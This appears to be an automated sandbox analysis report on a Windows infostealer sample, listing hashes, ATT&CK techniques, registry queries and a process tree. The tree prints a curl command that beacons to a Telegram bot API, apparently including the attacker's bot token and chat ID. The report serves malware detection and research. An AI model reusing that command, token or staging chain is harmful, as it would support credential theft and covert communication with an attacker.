664cf9b9a6c02eb803043cae1e2097d9fd1fa5c7fed6def439a969d6d5ea260b

Analysis

max time kernel
91s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Win64.CrypterX-gen.14448.exe
Size

673KB
MD5

e31217888b467821745770b0f9565f66
SHA1

a6b7f7f96f02c2e78f6d35570948f29ee89665d9
SHA256

664cf9b9a6c02eb803043cae1e2097d9fd1fa5c7fed6def439a969d6d5ea260b
SHA512

89e9ed74673f5894e4fc39d64cb0f74c2c8ac0e0a35d2c8ff11d95497bdbf3f799c87c3f2e86c03ece91e42002e67bd6de85023ca7a9264e2ae2fdc397e49557
SSDEEP

12288:kFjT8uf3TofH0ZYV4WYgeWYg955/155/9cR/DafecSUu9+sAS81mRhNmFbIesLIn:kaA3TofHEYVjg2fpHCIjCPfOtMdi

Score

8^/10

spyware stealer

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	tmp.vbs
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4076	tmp.vbs

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	tmp.vbs

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 1468	1704	SecuriteInfo.com.Win64.CrypterX-gen.14448.exe	92
PID 1704 wrote to memory of 1468	1704	SecuriteInfo.com.Win64.CrypterX-gen.14448.exe	92
PID 1468 wrote to memory of 4076	1468	cmd.exe	94
PID 1468 wrote to memory of 4076	1468	cmd.exe	94
PID 4076 wrote to memory of 4424	4076	tmp.vbs	95
PID 4076 wrote to memory of 4424	4076	tmp.vbs	95
PID 4424 wrote to memory of 2668	4424	WScript.exe	97
PID 4424 wrote to memory of 2668	4424	WScript.exe	97
PID 2668 wrote to memory of 2932	2668	cmd.exe	100
PID 2668 wrote to memory of 2932	2668	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win64.CrypterX-gen.14448.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win64.CrypterX-gen.14448.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\tmp.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4076
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2668
      - C:\Windows\system32\curl.exe
        
        curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
        6⤵
        
        PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.bat

Filesize
125B

MD5
d570d0e8e5cba465ed8dbf39b49e96b9

SHA1
9fee7d75e32a88326d51b79d282d55ee74df63ed

SHA256
2374afd5f860e8eff24bb072284054d45d8625eb2a8837ecd83869925760ea50

SHA512
d3d99e2290992b9073751a53f11187b86833778e2920136dc0fe644d4b0891f3df484cf165cf87dbe1f898c57760500596e1133f8ed3a8d629a7a8355e27650b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ping.vbs

Filesize
121B

MD5
69d21d90d16b7a1a89699696ea892799

SHA1
2f6a6701310c85e52920ad3d972e5fb85ce64b9a

SHA256
278af8bb4a00d8a8cddd66ec207f65665389d13e4fe32b442fb70a2d8c65318a

SHA512
315a460f2d05abaea058c291f52592d802dafcc13ffbeca49d210908a5f6c00bba1d0b8451e59c249005811bfc38a6983a6a13c9161f3705ba63d6608e3ce510

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.vbs

Filesize
451KB

MD5
daacfa20816a3ce2fcca32cb00c4ab84

SHA1
8cfb979be6e33f4351c390bfab9ddabfc39af9cd

SHA256
f7454663e81530097350372f1fcf2e189f434917b886247c7ea86459bb729eef

SHA512
3569eedfe0b953a975fc0190882fefe003397faaf2e166edecb5fcf6252e4df8665042cfe5898a59f9ac03d71adc7a8d1a256a1e0aad3b0cf9ddd7828b971bd7

Download Submit